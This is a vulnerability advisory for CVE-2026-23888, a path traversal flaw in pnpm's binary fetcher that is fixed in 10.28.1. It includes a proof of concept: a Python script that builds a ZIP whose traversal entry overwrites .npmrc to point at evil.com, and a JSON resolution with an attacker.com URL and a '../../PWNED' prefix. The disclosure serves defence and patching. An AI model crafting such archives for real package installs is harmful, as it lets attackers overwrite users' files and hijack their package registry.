CVE-2026-23888

描述

### Summary A path traversal vulnerability in pnpm's binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors: (1) Malicious ZIP entries containing `../` or absolute paths that escape the extraction root via AdmZip's `extractAllTo`, and (2) The `BinaryResolution.prefix` field is concatenated into the extraction path without validation, allowing a crafted prefix like `../../evil` to redirect extracted files outside `targetDir`. ### Details The vulnerability exists in the binary fetching and extraction logic: **1. Unvalidated ZIP Entry Extraction (`fetching/binary-fetcher/src/index.ts`)** AdmZip's `extractAllTo` does not validate entry paths for path traversal: ```typescript const zip = new AdmZip(buffer) const nodeDir = basename === '' ? targetDir : path.dirname(targetDir) const extractedDir = path.join(nodeDir, basename) zip.extractAllTo(nodeDir, true) // Entry paths not validated! await renameOverwrite(extractedDir, targetDir) ``` A ZIP entry with path `../../../.npmrc` will be written outside `nodeDir`. **2. Unvalidated Prefix in BinaryResolution (`resolving/resolver-base/src/index.ts`)** The `basename` variable comes from `BinaryResolution.prefix` and is used directly in path construction: ```typescript const extractedDir = path.join(nodeDir, basename) // If basename is '../../evil', this points outside nodeDir ``` ### PoC **Attack Vector 1: ZIP Entry Path Traversal** ```python import zipfile import io zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w') as zf: # Normal file zf.writestr('node-v20.0.0-linux-x64/bin/node', b'#!/bin/sh\necho "legit node"') # Malicious path traversal entry zf.writestr('../../../.npmrc', b'registry=https://evil.com/\n') with open('malicious-node.zip', 'wb') as f: f.write(zip_buffer.getvalue()) ``` **Attack Vector 2: Prefix Traversal via malicious resolution:** ```json { "resolution": { "type": "binary", "url": "https://attacker.com/node.zip", "prefix": "../../PWNED" } } ``` ### Impact - All pnpm users who install packages with binary assets - Users who configure custom Node.js binary locations - CI/CD pipelines that auto-install binary dependencies - Can overwrite config files, scripts, or other sensitive files leading to RCE Verified on pnpm main @ commit `5a0ed1d45`.

受影響套件(1)

• npm/pnpmfrom 0, < 10.28.1

CVSS 分數

參考連結(5)

• ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-23888
• PATCHhttps://github.com/pnpm/pnpm
• WEBhttps://github.com/pnpm/pnpm/commit/5c382f0ca3b7cc49963b94677426e66539dcb3f5
• WEBhttps://github.com/pnpm/pnpm/releases/tag/v10.28.1
• WEBhttps://github.com/pnpm/pnpm/security/advisories/GHSA-6pfh-p556-v868